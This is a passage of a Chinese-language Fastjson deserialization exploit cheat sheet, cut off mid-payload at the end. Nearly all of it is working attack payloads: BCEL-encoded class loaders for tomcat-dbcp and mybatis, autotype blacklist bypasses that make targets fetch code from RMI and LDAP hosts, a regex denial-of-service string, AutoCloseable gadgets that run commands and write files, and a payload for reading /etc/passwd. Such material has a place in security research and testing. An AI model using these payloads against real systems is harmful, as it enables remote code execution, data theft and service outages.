"driver":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$eb$7b$UW$Z$ff$9d$ddMf2$99$ddM6$q0$b4H$80$sM$C$d9$zB$v$yX$J$J5$98$h$b2$R$K$a9$c5$c9$e4$q$3b$b0$3b$b3$9d$9dM$C$5eZ$ad$da$aaX$b5$o$b6$dem$ad$94$96$aaxY$90$da$8aZ$5b$z$w$5e$3e$f8$cd$3f$c0$8f$3e$7e$f1y$7c$ac$ef$99$99Mv$93$U$c9$93$9c$cb$fb$be$bfs$de$fb$99$bc$f9$df$ab$af$C$d8$8e$h$K$g$60$u$98$C$X$c3$b4$8c$Z$FY$982NH8$a9$40BNB$5e$81$F$5bFA$c6C2$i$ZE$Z$ae$84$92$60$cf$ca$98$931$_$qN$c98$z$e3C$K$3e$8c$8f$c8$f8$a8$82$s$3c$y$86Gd$7cL$cc$l$97$f1$a8$98$3f$n$e3$932$3e$r$e31$Z$8fK$f8$b4$82MB$85M$f8$8c$Y$3e$x$e3$8c8$f8sbxB$c1$e7qJ$M_$90$f0E$ZOJ$f8$92$82$z8$ab$e0$cb8$t$e1$x2$9eR$b0$VO$8b$e1$ab$c2$96$af$c9$f8$ba$8co$c8$f8$a6$84oI$f86C$fd$k$d32$dd$7b$Z$c2$5d$dd$87$Z$o$fd$f6$Ug$88$P$9b$W$l$z$e5$t$b93$aeO$e6$88$92$Y$b6$N$3dwXwL$b1$P$88$R7k$W$Z$d6$M$hv$3e$e5$Y$9c$hY$3b$95$v8$a65$b3$9f$96$bb$Z$e4$3dF$$$b8$mb$d8$W$J$af$l$3e$a1$cf$ea$a9$9cn$cd$a4$i$3e$9d$e3$86$9b$ea$t$8e$eb$94$M$d7v$I$p9$r$cb5$f3t$7eK$95$ec$n$9f$u$f8EC$b7$y$ee$y$f0K$ae$99Ke$7c$o$f1$eb$j$5e$y$e5$5c$a1$f3$o$3c$e3$K$ad$88$5bg$e4$f4$d3$a7$Z$9a$ab$98$fd9$bdX$U$c8$3cw$b3$f6$U$c3$da$V$94$i$f1xB$ca$9e$3cA$84$da$f3$c7$3c$gq$h$i$feP$89$X$dd$R$3aF$nM$Kd$h$X$h$v$60$90S$wdZf$b9$3e$c5$j$c1$97$e7$i$d3$f5$97$R$p$3fu$9c$$$f2$v$M$n$9b$i$X$s$oC4$e3$ea$c6$c9$R$bd$e0$85$80$b2P$c2w$u$H$v$df$u$a2tc$c6$$Q$m$ee3Ex$e2$8b$a1H$KMU$ec$c6$k$J$cf$a8x$W$dfU$f1$i$be$c7$b0$c7vf$92EOn$da$d1$f3$7c$cevN$s$e7$f8d$92$a2$e5$f2y7$Zh$9d$3c$e4$cf$fd$3ey$d0$ce$91$da$S$ce$abx$k$X$YV$cdp7$90$e8s$c9$d5$93$r$97$93$ce$f1$r$3eV$f1$C$5edhZ$ea72B$c5E$bc$c4$b0$f7V$f5$c9pg6$b7$e2$a5$ca$a2$$$M$8d$de$a6$e2$ee$Oq$f1$7c$b2$e8c$93Y$d7$z$q$Hi$a8$3d$8c$82H$a8A$_25$ca$faI$a4$e2$fb$c2$88u$b5g$z$iQ$b9K$9cq$c4$L$a0$8a$l$e0$87$94$A$f7$f7$8e$db$t$b9E$x$bb$98$b4$c88$J$97T$fc$I$3ff$60$ed$w$7e$82$9f$aa$u$e32$DT$5c$c1$cf$u$e4y$ddPq$V$_S$daR$Z$95$e6$J$3agZS$f6$i$99$ZMM$9aVjR$_f$db$7b$8dv$b2$94$f2$p$c9$e7y$7bJ$ecV$_$d5z_$c9$U$nS$f1s$bc$a2$e2UqM$b3$90I$K$99dP$5d$w$7e$81$L$w$ae$e1$97$S$7e$a5$e2$d7x$z$90$aa$a9$c1$KR$d4$5d2$b3P$8c$9e$9ci$a7$OX$85$92K$97r$3d$af$e27x$5d$c2$h$w$7e$8b$dfU$8e$aa$$W$ca$ed$H$faT$bc$89$eb$w$7e$8f$cb$w$fe$80$3f$92$91$o$fen$8e$3cU7$9d$x$V$b3$5e$d5$da$c2$a9$z$8b$ca$ec$9f7x$c15m$92j$5b$b9$ffPgz$bb2$ae$J$ebx$96t$V$b5e$94$i$87$5bne$bf$aa$ab$7bx$a9$UUx$x$F6$u$D$_$a9$87m$3fQ$b4$g$f1$w$96$c0$ac$c8$a0$q$c9$d1$c2$a3Prv$z$efW$cbN$dc$ed$tV$c5$8a$bd$x$60$s$96a$bao$da$ceLk$96$d2$92aW$d7$f2$7e6$b1$9c$d4$bdR$d7k$s$9d$G8$b5V$87OUt$8b$W$b9$dbg$Y$bcX4$fd$d7$a2$eb$98xb$aa$eb$e9T$d1$e5y$bfH$P$3av$81$3b$ee$v$86$ce$ff$e3$87$c5V$5e$y$e4L$aa$d6$3bW$CL$ac$84ht$eda$7b$8e$3b$fd$baH$a6$da$f8$$$I$c9Y$aa$v$ff$j$a4G$f1$Ay$88$da$82$9e$a3$I$b5$ae$e0$a1$eec$q$a0$X$K$dc$o$93$7boI$f5$a0$U$c5U$ae$ed$93$u$e7$a7mgT$X$c5$d5V$e5$cb$aa$97$91a$5b$d7$ad$85$b6$f69$5dwS$B$f2$89$c5$e7$O$d0$5e$b7$M$$$7cy$ab$n$8fP$af1$de$c6$f9U$q$8a$abH$81$dd5$8d$q$m2$c4$c8$d6$aa$7eA$7d$ab$S$93$daFBp$b5T$e4$D$3cg$e6$fd7$f1$s$f7$$$f9$k$88XT$a9$e4kQ$b6$7e$a5$b5$y$af$d4$dd$d8$804$7d$n$89$9f$Q$98x$vi$7c$X$edR4SKF$5d$cfe$b0K$k$fb$5e$g$eb$3d$a2$8cwC$b4kO$A$7b$d1$e7$d1$f6U$c0$e1$bf$91$5c3A$ee$bc$82P$Z$e1D$a4$8c$ba$a1$9eD$7d$f8$VHe$c8$c3$9b$Z$ad$g$caPF$C$81F_$40$N$EF$7b$S$d1$60$99$8e$f4n$J$84$d3uZda$5d$l$mc$84L$c4$p$q$7c4$9ch$ca$94$d1$9c$96$CVB$b0Z$fcs$9a$d3$b2$s$91$g$ab4$d9$h$r$ad$8e0$N$84i$r$8cr$NM$e9$GM$d6$ea$x$c7$x$89$b6$xX$9dXS$86$W$7eg$Zk$d3$8d$89$db$d2$aa$d6$98$8e$86v$c4$b4h$Z$b7$bfH6$8f$d2_$Y$ec$b91$9a7$d4o$3a$f8$_$9a$b7$k$b4$9fy$94$e6$3e$z$9aXW$c6$3b$9eFgxG$ec$3c$dai$bf$de$db$b7E$c4$be$89$f6$ed$de$be$benG$ac5$f6$Ca$ee$A$82P$AZ$f0$d7$9e$d8$90V$cfCJl$a4$fb$h$5e$c7$9f_$c6$a6$a3$97q$87$a6$96$d1$a1$91$b2$jet$a6$d5$E$f9$bak$a8$c7$b7$b6$3b$j$d5$a2dg$8f$W$f5$N$da$7c$N$5b$d2$b1D$af$t$T8$x$99$a9$R$f4$dd$a1$c5$c4$b9$a92$ee$cax$a8$ad$e9$b8$WO$90$H$b6$95$b1$3d$dd$a4$ve$dc$9d$d8Q$ednM$J$90b$a7$i$f1$r$ee$J$bc$ae$v$81C$D$fa$cee$f4$f3$88$M$5d$S$89$U$da$Y$ea$c0$$r$a7H$b3s$e8$a0$b1$91RL$c5jD$vKc$e8E$i$3b$e9_$85$BJ$ad1$q0$81$W$ccb$V$ce$a0$VO$a2$NO$91$e4KXC$l$Okq$j$b7$e1$Gng$DX$cf$G$d1$ce$86$b0$91$8d$a1$83$8d$a3$93$9d$40$X$x$a0$9b$9dF$P$7b$E$9b$d9$T$e8eg$91d$cf$o$c5$$$e0$$$f6$g$b6$b2$3fa$h$fb$t$b6$87$U$dc$j$da$88$5d$a4$d9$3d$a1N$aa$U$91$f6$X$d1L$d8$e7$d1O$9aD$J$7d$W$fbq$lb$84$7b$Q$ef$c1$m$e2$84$3e$84$Dx$_$e9$aa$86$da0$84aB$ad$O5b$84$S$86aC$88$91$fe$H$v$c8$3b$d9$3f$f0$3e$a2$851$c0$feN$98QD0$c6$fe$8a$Mq$eb0$c1$de$c08$ad$ea1$cb$$$e2$fd$c4$95p$86$9d$c3aZ$c9$f4$d1X$c2$R$ba$a3$BWY$W$f7$93$9c$82$eb$ec$I$8e$S$ad$R7X$G$c7h$a5$92$97$40$3a$vo$e1$3f$88Kx$40$c2$H$q$3c$e8$8d$feba$7d$dc$5b$l$f7$7f$v$k$f1$b8$ba$b6$fe$df$I$bf$85$bf$88$94$dc$t$e1$83$m$edu$_$3d$t$ff$H$88$8eZ$e2$z$O$A$A" 203 | } 204 | }:"x"}} 205 | } 206 | } 207 | ``` 208 | 209 | ### tomcat-dbcp 210 | 同样 7 和 8+ payload不一样 211 | ```xml 212 | 213 | org.apache.tomcat 214 | tomcat-dbcp 215 | 8.5.42 216 | 217 | ``` 218 | 219 | ```http 220 | POST /test HTTP/1.1 221 | Host: 127.0.0.1:8080 222 | Content-Type: application/json 223 | X-Token: whoami 224 | 225 | { 226 | "a":{ 227 | "@type":"java.lang.Class", 228 | "val":"com.sun.org.apache.bcel.internal.util.ClassLoader" 229 | }, 230 | "b":{ 231 | "@type":"java.lang.Class", 232 | "val":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 233 | }, 234 | "c":{ 235 | "@type": "com.alibaba.fastjson.JSONObject", 236 | "name": { 237 | "@type": "java.lang.Class", 238 | "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 239 | } 240 | }, 241 | "d":{ 242 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader", 243 | "e": {"f":{{ 244 | "@type": "com.alibaba.fastjson.JSONObject", 245 | "g": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": { 246 | "$ref": ".." },"driverClassName":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$eb$7b$UW$Z$ff$9d$ddMf2$99$ddM6$q0$b4H$80$sM$C$d9$zB$v$yX$J$J5$98$h$b2$R$K$a9$c5$c9$e4$q$3b$b0$3b$b3$9d$9dM$C$5eZ$ad$da$aaX$b5$o$b6$dem$ad$94$96$aaxY$90$da$8aZ$5b$z$w$5e$3e$f8$cd$3f$c0$8f$3e$7e$f1y$7c$ac$ef$99$99Mv$93$U$c9$93$9c$cb$fb$be$bfs$de$fb$99$bc$f9$df$ab$af$C$d8$8e$h$K$g$60$u$98$C$X$c3$b4$8c$Z$FY$982NH8$a9$40BNB$5e$81$F$5bFA$c6C2$i$ZE$Z$ae$84$92$60$cf$ca$98$931$_$qN$c98$z$e3C$K$3e$8c$8f$c8$f8$a8$82$s$3c$y$86Gd$7cL$cc$l$97$f1$a8$98$3f$n$e3$932$3e$r$e31$Z$8fK$f8$b4$82MB$85M$f8$8c$Y$3e$x$e3$8c8$f8sbxB$c1$e7qJ$M_$90$f0E$ZOJ$f8$92$82$z8$ab$e0$cb8$t$e1$x2$9eR$b0$VO$8b$e1$ab$c2$96$af$c9$f8$ba$8co$c8$f8$a6$84oI$f86C$fd$k$d32$dd$7b$Z$c2$5d$dd$87$Z$o$fd$f6$Ug$88$P$9b$W$l$z$e5$t$b93$aeO$e6$88$92$Y$b6$N$3dwXwL$b1$P$88$R7k$W$Z$d6$M$hv$3e$e5$Y$9c$hY$3b$95$v8$a65$b3$9f$96$bb$Z$e4$3dF$$$b8$mb$d8$W$J$af$l$3e$a1$cf$ea$a9$9cn$cd$a4$i$3e$9d$e3$86$9b$ea$t$8e$eb$94$M$d7v$I$p9$r$cb5$f3t$7eK$95$ec$n$9f$u$f8EC$b7$y$ee$y$f0K$ae$99Ke$7c$o$f1$eb$j$5e$y$e5$5c$a1$f3$o$3c$e3$K$ad$88$5bg$e4$f4$d3$a7$Z$9a$ab$98$fd9$bdX$U$c8$3cw$b3$f6$U$c3$da$V$94$i$f1xB$ca$9e$3cA$84$da$f3$c7$3c$gq$h$i$feP$89$X$dd$R$3aF$nM$Kd$h$X$h$v$60$90S$wdZf$b9$3e$c5$j$c1$97$e7$i$d3$f5$97$R$p$3fu$9c$$$f2$v$M$n$9b$i$X$s$oC4$e3$ea$c6$c9$R$bd$e0$85$80$b2P$c2w$u$H$v$df$u$a2tc$c6$$Q$m$ee3Ex$e2$8b$a1H$KMU$ec$c6$k$J$cf$a8x$W$dfU$f1$i$be$c7$b0$c7vf$92EOn$da$d1$f3$7c$cevN$s$e7$f8d$92$a2$e5$f2y7$Zh$9d$3c$e4$cf$fd$3ey$d0$ce$91$da$S$ce$abx$k$X$YV$cdp7$90$e8s$c9$d5$93$r$97$93$ce$f1$r$3eV$f1$C$5edhZ$ea72B$c5E$bc$c4$b0$f7V$f5$c9pg6$b7$e2$a5$ca$a2$$$M$8d$de$a6$e2$ee$Oq$f1$7c$b2$e8c$93Y$d7$z$q$Hi$a8$3d$8c$82H$a8A$_25$ca$faI$a4$e2$fb$c2$88u$b5g$z$iQ$b9K$9cq$c4$L$a0$8a$l$e0$87$94$A$f7$f7$8e$db$t$b9E$x$bb$98$b4$c88$J$97T$fc$I$3ff$60$ed$w$7e$82$9f$aa$u$e32$DT$5c$c1$cf$u$e4y$ddPq$V$_S$daR$Z$95$e6$J$3agZS$f6$i$99$ZMM$9aVjR$_f$db$7b$8dv$b2$94$f2$p$c9$e7y$7bJ$ecV$_$d5z_$c9$U$nS$f1s$bc$a2$e2UqM$b3$90I$K$99dP$5d$w$7e$81$L$w$ae$e1$97$S$7e$a5$e2$d7x$z$90$aa$a9$c1$KR$d4$5d2$b3P$8c$9e$9ci$a7$OX$85$92K$97r$3d$af$e27x$5d$c2$h$w$7e$8b$dfU$8e$aa$$W$ca$ed$H$faT$bc$89$eb$w$7e$8f$cb$w$fe$80$3f$92$91$o$fen$8e$3cU7$9d$x$V$b3$5e$d5$da$c2$a9$z$8b$ca$ec$9f7x$c15m$92j$5b$b9$ffPgz$bb2$ae$J$ebx$96t$V$b5e$94$i$87$5bne$bf$aa$ab$7bx$a9$UUx$x$F6$u$D$_$a9$87m$3fQ$b4$g$f1$w$96$c0$ac$c8$a0$q$c9$d1$c2$a3Prv$z$efW$cbN$dc$ed$tV$c5$8a$bd$x$60$s$96a$bao$da$ceLk$96$d2$92aW$d7$f2$7e6$b1$9c$d4$bdR$d7k$s$9d$G8$b5V$87OUt$8b$W$b9$dbg$Y$bcX4$fd$d7$a2$eb$98xb$aa$eb$e9T$d1$e5y$bfH$P$3av$81$3b$ee$v$86$ce$ff$e3$87$c5V$5e$y$e4L$aa$d6$3bW$CL$ac$84ht$eda$7b$8e$3b$fd$baH$a6$da$f8$$$I$c9Y$aa$v$ff$j$a4G$f1$Ay$88$da$82$9e$a3$I$b5$ae$e0$a1$eec$q$a0$X$K$dc$o$93$7boI$f5$a0$U$c5U$ae$ed$93$u$e7$a7mgT$X$c5$d5V$e5$cb$aa$97$91a$5b$d7$ad$85$b6$f69$5dwS$B$f2$89$c5$e7$O$d0$5e$b7$M$$$7cy$ab$n$8fP$af1$de$c6$f9U$q$8a$abH$81$dd5$8d$q$m2$c4$c8$d6$aa$7eA$7d$ab$S$93$daFBp$b5T$e4$D$3cg$e6$fd7$f1$s$f7$$$f9$k$88XT$a9$e4kQ$b6$7e$a5$b5$y$af$d4$dd$d8$804$7d$n$89$9f$Q$98x$vi$7c$X$edR4SKF$5d$cfe$b0K$k$fb$5e$g$eb$3d$a2$8cwC$b4kO$A$7b$d1$e7$d1$f6U$c0$e1$bf$91$5c3A$ee$bc$82P$Z$e1D$a4$8c$ba$a1$9eD$7d$f8$VHe$c8$c3$9b$Z$ad$g$caPF$C$81F_$40$N$EF$7b$S$d1$60$99$8e$f4n$J$84$d3uZda$5d$l$mc$84L$c4$p$q$7c4$9ch$ca$94$d1$9c$96$CVB$b0Z$fcs$9a$d3$b2$s$91$g$ab4$d9$h$r$ad$8e0$N$84i$r$8cr$NM$e9$GM$d6$ea$x$c7$x$89$b6$xX$9dXS$86$W$7eg$Zk$d3$8d$89$db$d2$aa$d6$98$8e$86v$c4$b4h$Z$b7$bfH6$8f$d2_$Y$ec$b91$9a7$d4o$3a$f8$_$9a$b7$k$b4$9fy$94$e6$3e$z$9aXW$c6$3b$9eFgxG$ec$3c$dai$bf$de$db$b7E$c4$be$89$f6$ed$de$be$benG$ac5$f6$Ca$ee$A$82P$AZ$f0$d7$9e$d8$90V$cfCJl$a4$fb$h$5e$c7$9f_$c6$a6$a3$97q$87$a6$96$d1$a1$91$b2$jet$a6$d5$E$f9$bak$a8$c7$b7$b6$3b$j$d5$a2dg$8f$W$f5$N$da$7c$N$5b$d2$b1D$af$t$T8$x$99$a9$R$f4$dd$a1$c5$c4$b9$a92$ee$cax$a8$ad$e9$b8$WO$90$H$b6$95$b1$3d$dd$a4$ve$dc$9d$d8Q$ednM$J$90b$a7$i$f1$r$ee$J$bc$ae$v$81C$D$fa$cee$f4$f3$88$M$5d$S$89$U$da$Y$ea$c0$$r$a7H$b3s$e8$a0$b1$91RL$c5jD$vKc$e8E$i$3b$e9_$85$BJ$ad1$q0$81$W$ccb$V$ce$a0$VO$a2$NO$91$e4KXC$l$Okq$j$b7$e1$Gng$DX$cf$G$d1$ce$86$b0$91$8d$a1$83$8d$a3$93$9d$40$X$x$a0$9b$9dF$P$7b$E$9b$d9$T$e8eg$91d$cf$o$c5$$$e0$$$f6$g$b6$b2$3fa$h$fb$t$b6$87$U$dc$j$da$88$5d$a4$d9$3d$a1N$aa$U$91$f6$X$d1L$d8$e7$d1O$9aD$J$7d$W$fbq$lb$84$7b$Q$ef$c1$m$e2$84$3e$84$Dx$_$e9$aa$86$da0$84aB$ad$O5b$84$S$86aC$88$91$fe$H$v$c8$3b$d9$3f$f0$3e$a2$851$c0$feN$98QD0$c6$fe$8a$Mq$eb0$c1$de$c08$ad$ea1$cb$$$e2$fd$c4$95p$86$9d$c3aZ$c9$f4$d1X$c2$R$ba$a3$BWY$W$f7$93$9c$82$eb$ec$I$8e$S$ad$R7X$G$c7h$a5$92$97$40$3a$vo$e1$3f$88Kx$40$c2$H$q$3c$e8$8d$feba$7d$dc$5b$l$f7$7f$v$k$f1$b8$ba$b6$fe$df$I$bf$85$bf$88$94$dc$t$e1$83$m$edu$_$3d$t$ff$H$88$8eZ$e2$z$O$A$A"}}:"x"}} 247 | } 248 | } 249 | 250 | ``` 251 | 252 | 253 | # fastjson 1.2.25-1.2.45 黑名单 254 | 这些黑名单都需要手动开启autotype 255 | `ParserConfig.getGlobalInstance().setAutoTypeSupport(true);` 256 | 257 | ## 1.2.41 加L 258 | ```json 259 | {"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 260 | ``` 261 | ## 1.2.42 双写L 262 | ```json 263 | {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 264 | ``` 265 | 266 | ## 1.2.43 加`[{` 267 | ```json 268 | {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 269 | ``` 270 | 271 | ## 1.2.45 利用三方组件 272 | ### mybatis 273 | mybatis:3.x.x<3.5.0 274 | ```json 275 | {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://192.168.16.126:1099/whoopsunix"}} 276 | ``` 277 | 278 | # fastjson <=1.2.47 反序列化代码执行 279 | ## 缓存通杀 280 | 对于1.2.25-1.2.32:需关闭AutoTypeSupport 281 | 282 | ```json 283 | { 284 | "a":{ 285 | "@type":"java.lang.Class", 286 | "val":"com.sun.rowset.JdbcRowSetImpl" 287 | }, 288 | "b":{ 289 | "@type":"com.sun.rowset.JdbcRowSetImpl", 290 | "dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", 291 | "autoCommit":true 292 | } 293 | } 294 | ``` 295 | 296 | ## bcel 297 | 298 | ### tomcat-dbcp 299 | 同样 7 和 8+ payload不一样 300 | ```xml 301 | 302 | org.apache.tomcat 303 | tomcat-dbcp 304 | 8.5.42 305 | 306 | ``` 307 | 308 | 沿用前面BCEL 309 | ```http 310 | POST /test HTTP/1.1 311 | Host: 127.0.0.1:8080 312 | Content-Type: application/json 313 | cmd: whoami 314 | 315 | { 316 | "name": 317 | { 318 | "@type" : "java.lang.Class", 319 | "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 320 | }, 321 | "x" : { 322 | "name": { 323 | "@type" : "java.lang.Class", 324 | "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" 325 | }, 326 | "y": { 327 | "@type":"com.alibaba.fastjson.JSONObject", 328 | "c": { 329 | "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", 330 | "driverClassLoader": { 331 | "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" 332 | }, 333 | "driverClassName":"$$BCEL$..", 334 | 335 | "$ref": "$.x.y.c.connection" 336 | } 337 | } 338 | } 339 | } 340 | ``` 341 | 342 | ### ibatis 343 | ```xml 344 | 345 | org.mybatis 346 | mybatis 347 | 3.5.0 348 | 349 | ``` 350 | 351 | 沿用前面BCEL 352 | ```http 353 | POST /test HTTP/1.1 354 | Host: 127.0.0.1:8080 355 | Content-Type: application/json 356 | cmd: whoami 357 | 358 | 359 | {"@type":"com.alibaba.fastjson.JSONObject","name":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource","key":{"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driver":"{$$BCEL$$..}"}} 360 | ``` 361 | 362 | 363 | 364 | # Fastjson 1.2.36 - 1.2.62 远程拒绝服务 365 | 1.2.62_noneautotype、1.2.60.sec09_noneautotype、1.2.60_noneautotype 同样存在漏洞 366 | ```json 367 | {"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 368 | 369 | {"regex":{"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 370 | ``` 371 | 372 | # fastjson <= 1.2.60 反序列化代码执行 373 | 开启autotype 374 | ```xml 375 | 376 | commons-configuration 377 | commons-configuration 378 | 1.10 379 | 380 | ``` 381 | 382 | ```json 383 | {"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://192.168.16.126:1099/whoopsunix"} 384 | ``` 385 | 386 | # fastjson <= 1.2.61 反序列化代码执行 387 | ## configuration 388 | 开启autotype 389 | ```xml 390 | 391 | org.apache.commons 392 | commons-configuration2 393 | 2.7 394 | 395 | ``` 396 | 397 | ```json 398 | {"@type":"org.apache.commons.configuration2.JNDIConfiguration","prefix":"rmi://192.168.16.126:1099/whoopsunix"} 399 | ``` 400 | 401 | # fastjson <=1.2.62 反序列化代码执行 402 | ## xbean-reflect(确认版本是否1.2.68可用) 403 | 开启autotype 404 | ```xml 405 | 406 | org.apache.xbean 407 | xbean-reflect 408 | 4.14 409 | 410 | ``` 411 | 412 | ```json 413 | {"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/whoopsunix"} 414 | ``` 415 | 416 | # fastjson <= 1.2.66 反序列化代码执行 417 | ## shiro 418 | 开启autotype 419 | 420 | ```xml 421 | 422 | org.apache.shiro 423 | shiro-core 424 | 1.5.3 425 | 426 | ``` 427 | 428 | ```json 429 | // parseObject 430 | {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/whoopsunix"} 431 | {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/whoopsunix"], "Realms":[""]} 432 | ``` 433 | 434 | ## Anteros 435 | 开启autotype 436 | ```xml 437 | 438 | br.com.anteros 439 | Anteros-Core 440 | 1.2.2 441 | 442 | 443 | br.com.anteros 444 | Anteros-DBCP 445 | 1.0.1 446 | 447 | ``` 448 | 449 | ```json 450 | {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/whoopsunix"} 451 | {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/whoopsunix"} 452 | ``` 453 | 454 | ## ignite-jta 455 | 开启autotype 456 | ```xml 457 | 458 | org.apache.ignite 459 | ignite-jta 460 | 2.7.6 461 | 462 | ``` 463 | 464 | ```json 465 | {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/whoopsunix"} 466 | ``` 467 | 468 | # fastjson <= 1.2.67 反序列化代码执行和SSRF漏洞 469 | ## shiro 470 | 开启autotype 471 | ```xml 472 | 473 | com.alibaba 474 | fastjson 475 | 1.2.67 476 | compile 477 | 478 | 479 | org.apache.shiro 480 | shiro-core 481 | 1.5.3 482 | 483 | ``` 484 | 485 | ```json 486 | {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/whoopsunix","instance":{"$ref":"$.instance"}} 487 | ``` 488 | 489 | ## ignite-jta 490 | 开启autotype 491 | ```xml 492 | 493 | 494 | org.apache.ignite 495 | ignite-jta 496 | 2.7.6 497 | 498 | ``` 499 | 500 | ```json 501 | {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/whoopsunix"], "tm": {"$ref":"$.tm"}} 502 | ``` 503 | 504 | # fastjson <=1.2.68 反序列化代码执行(AutoCloseable) 505 | ## AutoCloseable demo 506 | ```json 507 | {"@type":"java.lang.AutoCloseable","@type":"com.example.test.Test","cmd":"open -a Calculator.app"} 508 | ``` 509 | 510 | ```java 511 | public class Test implements AutoCloseable{ 512 | public Test(String cmd){ 513 | try { 514 | Runtime.getRuntime().exec(cmd); 515 | } catch (IOException e) { 516 | e.printStackTrace(); 517 | } 518 | } 519 | @Override 520 | public void close() throws Exception { 521 | 522 | } 523 | } 524 | ``` 525 | 526 | ## write file demo(Jdk11) 527 | 528 | ```json 529 | { 530 | "@type": "java.lang.AutoCloseable", 531 | "@type": "java.io.FileOutputStream", 532 | "file": "/tmp/nonexist", 533 | "append": "false" 534 | } 535 | ``` 536 | 537 | ```json 538 | { 539 | "@type": "java.lang.AutoCloseable", 540 | "@type": "java.io.FileWriter", 541 | "file": "/tmp/nonexist", 542 | "append": "false" 543 | } 544 | ``` 545 | 546 | 547 | 548 | ## MarshalOutputStream 写文件 需要进一步验证 549 | 550 | 1.2.70以下jdk11可用 551 | 552 | ```json 553 | { 554 | "@type": "java.lang.AutoCloseable", 555 | "@type": "sun.rmi.server.MarshalOutputStream", 556 | "out": { 557 | "@type": "java.util.zip.InflaterOutputStream", 558 | "out": { 559 | "@type": "java.io.FileOutputStream", 560 | "file": "/tmp/asdasd", 561 | "append": true 562 | }, 563 | "infl": { 564 | "input": { 565 | "array": "eJxLLE5JTCkGAAh5AnE=", 566 | "limit": 14 567 | } 568 | }, 569 | "bufLen": "100" 570 | }, 571 | "protocolVersion": 1 572 | } 573 | ``` 574 | 575 | ## SafeFileOutputStream 文件内容迁移 jdk11测试 576 | target 不存在,temp 存在,则会调用 copy 方法将 temp 的内容迁移到 target 577 | ```xml 578 | 579 | org.aspectj 580 | aspectjtools 581 | 1.5.4 582 | 583 | ``` 584 | 585 | ```json 586 | { 587 | "@type": "java.lang.AutoCloseable", 588 | "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream", 589 | "targetPath": "/Users/whoopsunix/Desktop/test", 590 | "tempPath": "/Users/whoopsunix/Desktop/pass" 591 | } 592 | ``` 593 | 594 | 595 | 596 | ## SafeFileOutputStream 追加写文件 597 | 都不存在,BufferedOutputStream -> targetPath 598 | targetPath存在,tempPath 不存在,BufferedOutputStream -> tempPath 599 | targetPath不存在,tempPath 存在,BufferedOutputStream -> targetPath 600 | targetPath存在,tempPath 存在,BufferedOutputStream -> tempPath,利用io复写绕检测 601 | 602 | ```xml 603 | 604 | org.aspectj 605 | aspectjtools 606 | 1.5.4 607 | 608 | 609 | com.esotericsoftware 610 | kryo 611 | 4.0.0 612 | 613 | 614 | com.sleepycat 615 | je 616 | 18.3.12 617 | 618 | ``` 619 | 620 | ```json 621 | { 622 | "stream": { 623 | "@type": "java.lang.AutoCloseable", 624 | "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream", 625 | "targetPath": "C:/Users/whoopsunix/Desktop/ls/ls/4.txt", 626 | "tempPath": "a" 627 | }, 628 | "writer": { 629 | "@type": "java.lang.AutoCloseable", 630 | "@type": "com.esotericsoftware.kryo.io.Output", 631 | "buffer": "Y2VzaGk=", 632 | "outputStream": { 633 | "$ref": "$.stream" 634 | }, 635 | "position": 5 636 | }, 637 | "close": { 638 | "@type": "java.lang.AutoCloseable", 639 | "@type": "com.sleepycat.bind.serial.SerialOutput", 640 | "out": { 641 | "$ref": "$.writer" 642 | } 643 | } 644 | } 645 | ``` 646 | 647 | ## Commons IO 2.x 读文件 648 | ### 利用报错信息逐个猜解(类似盲注) 649 | byte 十进制ASCII码 650 | ```json 651 | { 652 | "abc": { 653 | "@type": "java.lang.AutoCloseable", 654 | "@type": "org.apache.commons.io.input.BOMInputStream", 655 | "delegate": { 656 | "@type": "org.apache.commons.io.input.ReaderInputStream", 657 | "reader": { 658 | "@type": "jdk.nashorn.api.scripting.URLReader", 659 | "url": "file:///etc/passwd" 660 | }, 661 | "charsetName": "UTF-8", 662 | "bufferSize": 1024 663 | }, 664 | "boms": [ 665 | { 666 